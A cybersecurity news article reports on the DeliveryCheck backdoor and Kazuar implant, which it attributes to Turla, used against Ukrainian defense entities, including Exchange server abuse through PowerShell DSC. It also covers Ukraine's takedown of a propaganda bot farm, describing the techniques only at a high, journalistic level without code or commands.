Backdoor Malware Used Against Ukrainian Defense Entities
A new .NET-based backdoor, named DeliveryCheck (also known as CAPIBAR or GAMEDAY), has been identified, specifically targeting the defense sector in Ukraine and Eastern Europe. This sophisticated backdoor has the capability to deliver subsequent payloads.
The attacks have been attributed to a Russian nation-state actor called Turla, which goes by various names like Iron Hunter, Secret Blizzard (formerly Krypton), Uroburos, Venomous Bear, and Waterbug. Turla is known to be linked to Russia's Federal Security Service (FSB). The attack vector involves distributing DeliveryCheck via email, utilizing documents containing malicious macros. Once infiltrated, DeliveryCheck persists through a scheduled task, which downloads and executes it in memory. Furthermore, it communicates with a command-and-control (C2) server to retrieve tasks, including launching arbitrary payloads embedded in XSLT stylesheets.
Initial Attack Uses Kazuar Implant
In some instances, the initial access is accompanied by the distribution of a known Turla implant known as Kazuar. This implant is well-equipped to steal application configuration files, event logs, and various data from web browsers. The main objective of these attacks is to exfiltrate messages from the Signal messaging app on Windows, enabling the adversaries to access sensitive conversations, documents, and images on the targeted systems.
A significant aspect of DeliveryCheck is its ability to compromise Microsoft Exchange servers by installing a server-side component using PowerShell Desired State Configuration (DSC), a platform that facilitates the automated configuration of Windows systems. This allows DSC to generate a Managed Object Format (MOF) file containing a PowerShell script that loads the embedded .NET payload into memory, effectively transforming a legitimate server into a malicious C2 center.
Ukraine Takes Down Propaganda Bot Farm
In parallel, the Cyber Police of Ukraine successfully dismantled a large-scale bot farm, implicating more than 100 individuals engaged in spreading hostile propaganda justifying the Russian invasion. The group was also involved in leaking personal information belonging to Ukrainian citizens and executing various fraud schemes. As part of this operation, searches were conducted in 21 locations, resulting in the seizure of computer equipment, mobile phones, over 250 GSM gateways, and about 150,000 SIM cards belonging to different mobile operators.